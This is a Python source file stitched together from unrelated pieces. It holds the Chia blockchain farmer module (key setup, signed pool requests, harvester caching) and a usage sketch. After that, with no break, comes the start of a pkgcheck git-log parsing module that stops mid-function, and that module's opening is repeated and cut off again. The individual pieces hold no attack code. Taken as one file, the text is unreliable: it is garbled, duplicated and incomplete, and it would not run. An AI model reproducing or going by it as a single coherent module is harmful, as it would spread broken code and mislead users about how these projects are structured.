import asyncio import json import logging import time from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple import traceback import aiohttp from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey import chia.server.ws_connection as ws # lgtm [py/import-and-import-from] from chia.consensus.coinbase import create_puzzlehash_for_pk from chia.consensus.constants import ConsensusConstants from chia.daemon.keychain_proxy import ( KeychainProxy, KeychainProxyConnectionFailure, connect_to_keychain_and_validate, wrap_local_keychain, ) from chia.pools.pool_config import PoolWalletConfig, load_pool_config from chia.protocols import farmer_protocol, harvester_protocol from chia.protocols.pool_protocol import ( ErrorResponse, get_current_authentication_token, GetFarmerResponse, PoolErrorCode, PostFarmerPayload, PostFarmerRequest, PutFarmerPayload, PutFarmerRequest, AuthenticationPayload, ) from chia.protocols.protocol_message_types import ProtocolMessageTypes from chia.server.outbound_message import NodeType, make_msg from chia.server.server import ssl_context_for_root from chia.server.ws_connection import WSChiaConnection from chia.ssl.create_ssl import get_mozilla_ca_crt from chia.types.blockchain_format.proof_of_space import ProofOfSpace from chia.types.blockchain_format.sized_bytes import bytes32 from chia.util.bech32m import decode_puzzle_hash from chia.util.byte_types import hexstr_to_bytes from chia.util.config import load_config, save_config, config_path_for_filename from chia.util.hash import std_hash from chia.util.ints import uint8, uint16, uint32, uint64 from chia.util.keychain import Keychain from chia.wallet.derive_keys import ( master_sk_to_farmer_sk, master_sk_to_pool_sk, master_sk_to_wallet_sk, find_authentication_sk, find_owner_sk, ) from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD singleton_mod_hash = SINGLETON_MOD.get_tree_hash() log = logging.getLogger(__name__) UPDATE_POOL_INFO_INTERVAL: int = 3600 UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300 UPDATE_HARVESTER_CACHE_INTERVAL: int = 90 """ HARVESTER PROTOCOL (FARMER <-> HARVESTER) """ class HarvesterCacheEntry: def __init__(self): self.data: Optional[dict] = None self.last_update: float = 0 def bump_last_update(self): self.last_update = time.time() def set_data(self, data): self.data = data self.bump_last_update() def needs_update(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL def expired(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL * 10 class Farmer: def __init__( self, root_path: Path, farmer_config: Dict, pool_config: Dict, consensus_constants: ConsensusConstants, local_keychain: Optional[Keychain] = None, ): self.keychain_proxy: Optional[KeychainProxy] = None self.local_keychain = local_keychain self._root_path = root_path self.config = farmer_config self.pool_config = pool_config # Keep track of all sps, keyed on challenge chain signage point hash self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {} # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {} # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {} # number of responses to each signage point self.number_of_responses: Dict[bytes32, int] = {} # A dictionary of keys to time added. 
These keys refer to keys in the above 4 dictionaries. This is used # to periodically clear the memory self.cache_add_time: Dict[bytes32, uint64] = {} self.cache_clear_task: asyncio.Task self.update_pool_state_task: asyncio.Task self.constants = consensus_constants self._shut_down = False self.server: Any = None self.state_changed_callback: Optional[Callable] = None self.log = log async def ensure_keychain_proxy(self) -> KeychainProxy: if not self.keychain_proxy: if self.local_keychain: self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log) else: self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log) if not self.keychain_proxy: raise KeychainProxyConnectionFailure("Failed to connect to keychain service") return self.keychain_proxy async def get_all_private_keys(self): keychain_proxy = await self.ensure_keychain_proxy() return await keychain_proxy.get_all_private_keys() async def setup_keys(self): self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [ master_sk_to_pool_sk(sk) for sk in self.all_root_sks ] if len(self.get_public_keys()) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." raise RuntimeError(error_str) # This is the farmer configuration self.farmer_target_encoded = self.config["xch_target_address"] self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded) self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]] # This is the self pooling configuration, which is only used for original self-pooled plots self.pool_target_encoded = self.pool_config["xch_target_address"] self.pool_target = decode_puzzle_hash(self.pool_target_encoded) self.pool_sks_map: Dict = {} for key in self.get_private_keys(): self.pool_sks_map[bytes(key.get_g1())] = key assert len(self.farmer_target) == 32 assert len(self.pool_target) == 32 if len(self.pool_sks_map) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." 
raise RuntimeError(error_str) # The variables below are for use with an actual pool # From p2_singleton_puzzle_hash to pool state dict self.pool_state: Dict[bytes32, Dict] = {} # From public key bytes to PrivateKey self.authentication_keys: Dict[bytes, PrivateKey] = {} # Last time we updated pool_state based on the config file self.last_config_access_time: uint64 = uint64(0) self.harvester_cache: Dict[str, Dict[str, HarvesterCacheEntry]] = {} async def _start(self): await self.setup_keys() self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task()) self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task()) def _close(self): self._shut_down = True async def _await_closed(self): await self.cache_clear_task await self.update_pool_state_task def _set_state_changed_callback(self, callback: Callable): self.state_changed_callback = callback async def on_connect(self, peer: WSChiaConnection): # Sends a handshake to the harvester self.state_changed("add_connection", {}) handshake = harvester_protocol.HarvesterHandshake( self.get_public_keys(), self.pool_public_keys, ) if peer.connection_type is NodeType.HARVESTER: msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake) await peer.send_message(msg) def set_server(self, server): self.server = server def state_changed(self, change: str, data: Dict[str, Any]): if self.state_changed_callback is not None: self.state_changed_callback(change, data) def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str): self.log.error(error_message) self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append( ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict() ) def on_disconnect(self, connection: ws.WSChiaConnection): self.log.info(f"peer disconnected {connection.get_peer_info()}") self.state_changed("close_connection", {}) async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]: try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt()) ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /pool_info response: {response}") return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}" ) return None async def _pool_get_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey ) -> Optional[Dict]: assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) get_farmer_params = { "launcher_id": pool_config.launcher_id.hex(), "authentication_token": authentication_token, "signature": bytes(signature).hex(), } try: async with aiohttp.ClientSession(trust_env=True) as session: async with session.get( f"{pool_config.pool_url}/farmer", params=get_farmer_params, ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if 
resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"GET /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in GET /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_post_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: post_farmer_payload: PostFarmerPayload = PostFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash()) post_farmer_request = PostFarmerRequest(post_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.post( f"{pool_config.pool_url}/farmer", json=post_farmer_request.to_json_dict(), ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"POST /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in POST /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}" ) return None async def _pool_put_farmer( self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey ) -> Optional[Dict]: put_farmer_payload: PutFarmerPayload = PutFarmerPayload( pool_config.launcher_id, get_current_authentication_token(authentication_token_timeout), pool_config.authentication_public_key, pool_config.payout_instructions, None, ) assert owner_sk.get_g1() == pool_config.owner_public_key signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash()) put_farmer_request = PutFarmerRequest(put_farmer_payload, signature) try: async with aiohttp.ClientSession() as session: async with session.put( f"{pool_config.pool_url}/farmer", json=put_farmer_request.to_json_dict(), ssl=ssl_context_for_root(get_mozilla_ca_crt()), ) as resp: if resp.ok: response: Dict = json.loads(await resp.text()) self.log.info(f"PUT /farmer response: {response}") if "error_code" in response: self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response) return response else: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}", ) except Exception as e: self.handle_failed_pool_response( pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}" ) return None async def update_pool_state(self): config = load_config(self._root_path, "config.yaml") pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path) for pool_config in pool_config_list: p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash try: authentication_sk: Optional[PrivateKey] = await
find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue if p2_singleton_puzzle_hash not in self.pool_state: self.authentication_keys[bytes(pool_config.authentication_public_key)] = authentication_sk self.pool_state[p2_singleton_puzzle_hash] = { "points_found_since_start": 0, "points_found_24h": [], "points_acknowledged_since_start": 0, "points_acknowledged_24h": [], "next_farmer_update": 0, "next_pool_info_update": 0, "current_points": 0, "current_difficulty": None, "pool_errors_24h": [], "authentication_token_timeout": None, } self.log.info(f"Added pool: {pool_config}") pool_state = self.pool_state[p2_singleton_puzzle_hash] pool_state["pool_config"] = pool_config # Skip state update when self pooling if pool_config.pool_url == "": continue enforce_https = config["full_node"]["selected_network"] == "mainnet" if enforce_https and not pool_config.pool_url.startswith("https://"): self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}") continue # TODO: Improve error handling below, inform about unexpected failures if time.time() >= pool_state["next_pool_info_update"]: # Makes a GET request to the pool to get the updated information pool_info = await self._pool_get_pool_info(pool_config) if pool_info is not None and "error_code" not in pool_info: pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"] pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL # Only update the first time from GET /pool_info, gets updated from GET /farmer later if pool_state["current_difficulty"] is None: pool_state["current_difficulty"] = pool_info["minimum_difficulty"] if time.time() >= pool_state["next_farmer_update"]: authentication_token_timeout = pool_state["authentication_token_timeout"] async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[bool]]: # Run a GET /farmer to see if the farmer is already known by the pool response = await self._pool_get_farmer( pool_config, authentication_token_timeout, authentication_sk ) farmer_response: Optional[GetFarmerResponse] = None farmer_known: Optional[bool] = None if response is not None: if "error_code" not in response: farmer_response = GetFarmerResponse.from_json_dict(response) if farmer_response is not None: pool_state["current_difficulty"] = farmer_response.current_difficulty pool_state["current_points"] = farmer_response.current_points pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL else: farmer_known = response["error_code"] != PoolErrorCode.FARMER_NOT_KNOWN.value self.log.error( "update_pool_farmer_info failed: " f"{response['error_code']}, {response['error_message']}" ) return farmer_response, farmer_known if authentication_token_timeout is not None: farmer_info, farmer_is_known = await update_pool_farmer_info() if farmer_info is None and farmer_is_known is not None and not farmer_is_known: # Make the farmer known on the pool with a POST /farmer owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) post_response = await self._pool_post_farmer( pool_config, authentication_token_timeout, owner_sk ) if post_response is not None and "error_code" not in post_response: self.log.info( f"Welcome message from {pool_config.pool_url}: " f"{post_response['welcome_message']}" ) # Now we should be able to update the local farmer info farmer_info,
farmer_is_known = await update_pool_farmer_info() if farmer_info is None and not farmer_is_known: self.log.error("Failed to update farmer info after POST /farmer.") # Update the payout instructions on the pool if required if ( farmer_info is not None and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower() ): owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key) put_farmer_response_dict = await self._pool_put_farmer( pool_config, authentication_token_timeout, owner_sk ) try: # put_farmer_response: PutFarmerResponse = PutFarmerResponse.from_json_dict( # put_farmer_response_dict # ) # if put_farmer_response.payout_instructions: # self.log.info( # f"Farmer information successfully updated on the pool {pool_config.pool_url}" # ) # TODO: Fix Streamable implementation and recover the above. if put_farmer_response_dict["payout_instructions"]: self.log.info( f"Farmer information successfully updated on the pool {pool_config.pool_url}" ) else: raise Exception except Exception: self.log.error( f"Failed to update farmer information on the pool {pool_config.pool_url}" ) else: self.log.warning( f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}" f", check communication with the pool." ) except Exception as e: tb = traceback.format_exc() self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}") def get_public_keys(self): return [child_sk.get_g1() for child_sk in self._private_keys] def get_private_keys(self): return self._private_keys async def get_reward_targets(self, search_for_private_key: bool) -> Dict: if search_for_private_key: all_sks = await self.get_all_private_keys() stop_searching_for_farmer, stop_searching_for_pool = False, False for i in range(500): if stop_searching_for_farmer and stop_searching_for_pool and i > 0: break for sk, _ in all_sks: ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()) if ph == self.farmer_target: stop_searching_for_farmer = True if ph == self.pool_target: stop_searching_for_pool = True return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, "have_farmer_sk": stop_searching_for_farmer, "have_pool_sk": stop_searching_for_pool, } return { "farmer_target": self.farmer_target_encoded, "pool_target": self.pool_target_encoded, } def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]): config = load_config(self._root_path, "config.yaml") if farmer_target_encoded is not None: self.farmer_target_encoded = farmer_target_encoded self.farmer_target = decode_puzzle_hash(farmer_target_encoded) config["farmer"]["xch_target_address"] = farmer_target_encoded if pool_target_encoded is not None: self.pool_target_encoded = pool_target_encoded self.pool_target = decode_puzzle_hash(pool_target_encoded) config["pool"]["xch_target_address"] = pool_target_encoded save_config(self._root_path, "config.yaml", config) async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str): for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items(): if launcher_id == pool_state_dict["pool_config"].launcher_id: config = load_config(self._root_path, "config.yaml") new_list = [] for list_element in config["pool"]["pool_list"]: if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id): list_element["payout_instructions"] = payout_instructions new_list.append(list_element) config["pool"]["pool_list"] = new_list 
save_config(self._root_path, "config.yaml", config) # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions pool_state_dict["next_farmer_update"] = 0 return self.log.warning(f"Launcher id: {launcher_id} not found") async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]: for pool_state in self.pool_state.values(): pool_config: PoolWalletConfig = pool_state["pool_config"] if pool_config.launcher_id == launcher_id: authentication_sk: Optional[PrivateKey] = await find_authentication_sk( self.all_root_sks, pool_config.authentication_public_key ) if authentication_sk is None: self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}") continue assert authentication_sk.get_g1() == pool_config.authentication_public_key authentication_token_timeout = pool_state["authentication_token_timeout"] authentication_token = get_current_authentication_token(authentication_token_timeout) message: bytes32 = std_hash( AuthenticationPayload( "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token ) ) signature: G2Element = AugSchemeMPL.sign(authentication_sk, message) return ( pool_config.pool_url + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}" f"&signature={bytes(signature).hex()}" ) return None async def update_cached_harvesters(self) -> bool: # First remove outdated cache entries self.log.debug(f"update_cached_harvesters cache entries: {len(self.harvester_cache)}") remove_hosts = [] for host, host_cache in self.harvester_cache.items(): remove_peers = [] for peer_id, peer_cache in host_cache.items(): # If the peer cache is expired it means the harvester didn't respond for too long if peer_cache.expired(): remove_peers.append(peer_id) for key in remove_peers: del host_cache[key] if len(host_cache) == 0: self.log.debug(f"update_cached_harvesters remove host: {host}") remove_hosts.append(host) for key in remove_hosts: del self.harvester_cache[key] # Now query each harvester and update caches updated = False for connection in self.server.get_connections(NodeType.HARVESTER): cache_entry = await self.get_cached_harvesters(connection) if cache_entry.needs_update(): self.log.debug(f"update_cached_harvesters update harvester: {connection.peer_node_id}") cache_entry.bump_last_update() response = await connection.request_plots( harvester_protocol.RequestPlots(), timeout=UPDATE_HARVESTER_CACHE_INTERVAL ) if response is not None: if isinstance(response, harvester_protocol.RespondPlots): new_data: Dict = response.to_json_dict() if cache_entry.data != new_data: updated = True self.log.debug(f"update_cached_harvesters cache updated: {connection.peer_node_id}") else: self.log.debug(f"update_cached_harvesters no changes for: {connection.peer_node_id}") cache_entry.set_data(new_data) else: self.log.error( f"Invalid response from harvester:" f"peer_host {connection.peer_host}, peer_node_id {connection.peer_node_id}" ) else: self.log.error( "Harvester did not respond. 
You might need to update harvester to the latest version" ) return updated async def get_cached_harvesters(self, connection: WSChiaConnection) -> HarvesterCacheEntry: host_cache = self.harvester_cache.get(connection.peer_host) if host_cache is None: host_cache = {} self.harvester_cache[connection.peer_host] = host_cache node_cache = host_cache.get(connection.peer_node_id.hex()) if node_cache is None: node_cache = HarvesterCacheEntry() host_cache[connection.peer_node_id.hex()] = node_cache return node_cache async def get_harvesters(self) -> Dict: harvesters: List = [] for connection in self.server.get_connections(NodeType.HARVESTER): self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}") cache_entry = await self.get_cached_harvesters(connection) if cache_entry.data is not None: harvester_object: dict = dict(cache_entry.data) harvester_object["connection"] = { "node_id": connection.peer_node_id.hex(), "host": connection.peer_host, "port": connection.peer_port, } harvesters.append(harvester_object) else: self.log.debug(f"get_harvesters no cache: {connection.peer_host}, node_id: {connection.peer_node_id}") return {"harvesters": harvesters} async def _periodically_update_pool_state_task(self): time_slept: uint64 = uint64(0) config_path: Path = config_path_for_filename(self._root_path, "config.yaml") while not self._shut_down: # Every time the config file changes, read it to check the pool state stat_info = config_path.stat() if stat_info.st_mtime > self.last_config_access_time: # If we detect the config file changed, refresh private keys first just in case self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self.last_config_access_time = stat_info.st_mtime await self.update_pool_state() time_slept = uint64(0) elif time_slept > 60: await self.update_pool_state() time_slept = uint64(0) time_slept += 1 await asyncio.sleep(1) async def _periodically_clear_cache_and_refresh_task(self): time_slept: uint64 = uint64(0) refresh_slept = 0 while not self._shut_down: try: if time_slept > self.constants.SUB_SLOT_TIME_TARGET: now = time.time() removed_keys: List[bytes32] = [] for key, add_time in self.cache_add_time.items(): if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3: self.sps.pop(key, None) self.proofs_of_space.pop(key, None) self.quality_str_to_identifiers.pop(key, None) self.number_of_responses.pop(key, None) removed_keys.append(key) for key in removed_keys: self.cache_add_time.pop(key, None) time_slept = uint64(0) log.debug( f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} " f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}" ) time_slept += 1 refresh_slept += 1 # Periodically refresh GUI to show the correct download/upload rate. if refresh_slept >= 30: self.state_changed("add_connection", {}) refresh_slept = 0 # Handles harvester plots cache cleanup and updates if await self.update_cached_harvesters(): self.state_changed("new_plots", await self.get_harvesters()) except Exception: log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}") await asyncio.sleep(1)
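# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the Farmer implementation above): a minimal
# illustration of the Farmer lifecycle -- construct it, await _start() to spawn
# the periodic pool-state and harvester-cache tasks, then _close() and
# _await_closed() to shut down. In the real daemon this wiring is done by the
# chia service framework; DEFAULT_ROOT_PATH and DEFAULT_CONSTANTS below are
# assumptions taken from the wider chia-blockchain package, and the sketch
# further assumes a reachable keychain that already holds farming keys.
from chia.consensus.default_constants import DEFAULT_CONSTANTS  # assumption
from chia.util.default_root import DEFAULT_ROOT_PATH  # assumption


async def _run_farmer_sketch() -> None:
    config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
    farmer = Farmer(DEFAULT_ROOT_PATH, config["farmer"], config["pool"], DEFAULT_CONSTANTS)
    await farmer._start()  # spawns the two periodic background tasks
    try:
        await asyncio.sleep(60)  # let pool state and harvester caches refresh once
    finally:
        farmer._close()  # signal shutdown to the update loops
        await farmer._await_closed()  # wait for both tasks to finish


if __name__ == "__main__":
    asyncio.run(_run_farmer_sketch())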
"""Git specific support and addon.""" import argparse import os import re import shlex import subprocess from collections import defaultdict, deque from dataclasses import dataclass from datetime import datetime from functools import partial from itertools import takewhile from pathspec import PathSpec from pkgcore.ebuild import cpv from pkgcore.ebuild.atom import MalformedAtom from pkgcore.ebuild.atom import atom as atom_cls from pkgcore.repository import multiplex from pkgcore.repository.util import SimpleTree from pkgcore.restrictions import packages from snakeoil.cli import arghparse from snakeoil.contexts import GitStash from snakeoil.klass import jit_attr from snakeoil.mappings import ImmutableDict, OrderedSet from snakeoil.osutils import pjoin from snakeoil.process import CommandNotFound, find_binary from snakeoil.strings import pluralism from .. import base from ..base import PkgcheckUserException from ..checks import GitCommitsCheck from ..log import logger from . import caches @dataclass(frozen=True, eq=False) class GitCommit: """Git commit objects.""" hash: str commit_time: int author: str committer: str message: tuple pkgs: ImmutableDict = ImmutableDict() def __str__(self): return self.hash def __hash__(self): return hash(self.hash) def __eq__(self, other): return self.hash == other.hash @dataclass(frozen=True) class GitPkgChange: """Git package change objects.""" atom: atom_cls status: str commit: str commit_time: int old: atom_cls = None class GitError(Exception): """Generic git-related error.""" class GitCache(caches.DictCache): """Dictionary-based cache that encapsulates git commit data.""" def __init__(self, *args, commit): super().__init__(*args) self.commit = commit class GitLog: """Iterator for decoded `git log` line output.""" def __init__(self, cmd, path): self._running = False self.proc = subprocess.Popen( cmd, cwd=path, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def __iter__(self): return self def __next__(self): # use replacement character for non-UTF8 decoding issues (issue #166) line = self.proc.stdout.readline().decode('utf-8', 'replace') # verify git log is running as expected after pulling the first line if not self._running: if self.proc.poll() or not line: error = self.proc.stderr.read().decode().strip() raise GitError(f'failed running git log: {error}') self._running = True # EOF has been reached when readline() returns an empty string if not line: raise StopIteration return line.rstrip() class _ParseGitRepo: """Generic iterator for custom git log output parsing support.""" # git command to run on the targeted repo _git_cmd = 'git log --name-status --diff-filter=ARMD -z' # custom git log format lines, see the "PRETTY FORMATS" section of # the git log man page for details _format = () # path regexes for git log parsing, validation is handled on instantiation _ebuild_re = re.compile(r'^(?P<category>[^/]+)/[^/]+/(?P<package>[^/]+)\.ebuild$') def __init__(self, path, commit_range): self.path = os.path.realpath(path) cmd = shlex.split(self._git_cmd) cmd.append(f"--pretty=tformat:%n{"%n".join(self._format)}") cmd.append(commit_range) self.git_log = GitLog(cmd, self.path) # discard the initial newline next(self.git_log) def __iter__(self): return self def __next__(self): raise NotImplementedError(self.__next__) @property def changes(self): """Generator of file change status with changed packages.""" changes = deque(next(self.git_log).strip('\x00').split('\x00')) while changes: status = changes.popleft() if status.startswith('R'): # matched R status change 
status = 'R' old = changes.popleft() new = changes.popleft() if (mo := self._ebuild_re.match(old)) and (mn := self._ebuild_re.match(new)): try: old_pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") new_pkg = atom_cls(f"={mn.group('category')}/{mn.group('package')}") yield status, [old_pkg, new_pkg] except MalformedAtom: continue else: # matched ADM status change path = changes.popleft() if mo := self._ebuild_re.match(path): try: pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") yield status, [pkg] except MalformedAtom: continue class GitRepoCommits(_ParseGitRepo): """Parse git log output into an iterator of commit objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit timestamp '%an <%ae>', # Author Name <author@email.com> '%cn <%ce>', # Committer Name <committer@email.com> '%B', # commit message ) def __next__(self): commit_hash = next(self.git_log) commit_time = int(next(self.git_log)) author = next(self.git_log) committer = next(self.git_log) message = list(takewhile(lambda x: x != '\x00', self.git_log)) pkgs = defaultdict(set) for status, atoms in self.changes: if status == 'R': old, new = atoms pkgs['A'].add(new) pkgs['D'].add(old) else: pkgs[status].update(atoms) return GitCommit(commit_hash, commit_time, author, committer, message, ImmutableDict(pkgs)) class GitRepoPkgs(_ParseGitRepo): """Parse git log output into an iterator of package change objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit time ) def __init__(self, *args, local=False): super().__init__(*args) self.local = local self._pkgs = deque() def __next__(self): while True: try: return self._pkgs.popleft() except IndexError: commit_hash = next(self.git_log) commit_time = int(next(self.git_log).rstrip('\x00')) self._pkg_changes(commit_hash, commit_time) def _pkg_changes(self, commit_hash, commit_time): """Queue package change objects from git log file changes.""" for status, pkgs in self.changes: if status == 'R': old, new = pkgs if not self.local: # treat rename as addition and removal self._pkgs.append( GitPkgChange(new, 'A', commit_hash, commit_time)) self._pkgs.append( GitPkgChange(old, 'D', commit_hash, commit_time)) else: # renames are split into add/remove ops at # the check level for the local commits repo self._pkgs.append(GitPkgChange( new, 'R', commit_hash, commit_time, old)) else: self._pkgs.append(GitPkgChange(pkgs[0], status, commit_hash, commit_time)) class _GitCommitPkg(cpv.VersionedCPV): """Fake packages encapsulating commits parsed from git log.""" def __init__(self, category, package, status, version, time, commit, old=None): super().__init__(category, package, version) # add additional attrs sf = object.__setattr__ sf(self, 'time', time) sf(self, 'status', status) sf(self, 'commit', commit) sf(self, 'old', old) def old_pkg(self): """Create a new object from a rename commit's old atom.""" return self.__class__( self.old.category, self.old.package, self.status, self.old.version, self.time, self.commit) class GitChangedRepo(SimpleTree): """Historical git repo consisting of the latest changed packages.""" # selected pkg status filter _status_filter = {'A', 'R', 'M', 'D'} def __init__(self, *args, **kwargs): kwargs.setdefault('pkg_klass', _GitCommitPkg) super().__init__(*args, **kwargs) def _get_versions(self, cp): versions = [] for status, data in self.cpv_dict[cp[0]][cp[1]].items(): if status in self._status_filter: for commit in data: versions.append((status, commit)) return versions def _internal_gen_candidates(self, candidates, sorter,
"""Git specific support and addon.""" import argparse import os import re import shlex import subprocess from collections import defaultdict, deque from dataclasses import dataclass from datetime import datetime from functools import partial from itertools import takewhile from pathspec import PathSpec from pkgcore.ebuild import cpv from pkgcore.ebuild.atom import MalformedAtom from pkgcore.ebuild.atom import atom as atom_cls from pkgcore.repository import multiplex from pkgcore.repository.util import SimpleTree from pkgcore.restrictions import packages from snakeoil.cli import arghparse from snakeoil.contexts import GitStash from snakeoil.klass import jit_attr from snakeoil.mappings import ImmutableDict, OrderedSet from snakeoil.osutils import pjoin from snakeoil.process import CommandNotFound, find_binary from snakeoil.strings import pluralism from .. import base from ..base import PkgcheckUserException from ..checks import GitCommitsCheck from ..log import logger from . import caches @dataclass(frozen=True, eq=False) class GitCommit: """Git commit objects.""" hash: str commit_time: int author: str committer: str message: tuple pkgs: ImmutableDict = ImmutableDict() def __str__(self): return self.hash def __hash__(self): return hash(self.hash) def __eq__(self, other): return self.hash == other.hash @dataclass(frozen=True) class GitPkgChange: """Git package change objects.""" atom: atom_cls status: str commit: str commit_time: int old: atom_cls = None class GitError(Exception): """Generic git-related error.""" class GitCache(caches.DictCache): """Dictionary-based cache that encapsulates git commit data.""" def __init__(self, *args, commit): super().__init__(*args) self.commit = commit class GitLog: """Iterator for decoded `git log` line output.""" def __init__(self, cmd, path): self._running = False self.proc = subprocess.Popen( cmd, cwd=path, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def __iter__(self): return self def __next__(self): # use replacement character for non-UTF8 decoding issues (issue #166) line = self.proc.stdout.readline().decode('utf-8', 'replace') # verify git log is running as expected after pulling the first line if not self._running: if self.proc.poll() or not line: error = self.proc.stderr.read().decode().strip() raise GitError(f'failed running git log: {error}') self._running = True # EOF has been reached when readline() returns an empty string if not line: raise StopIteration return line.rstrip() class _ParseGitRepo: """Generic iterator for custom git 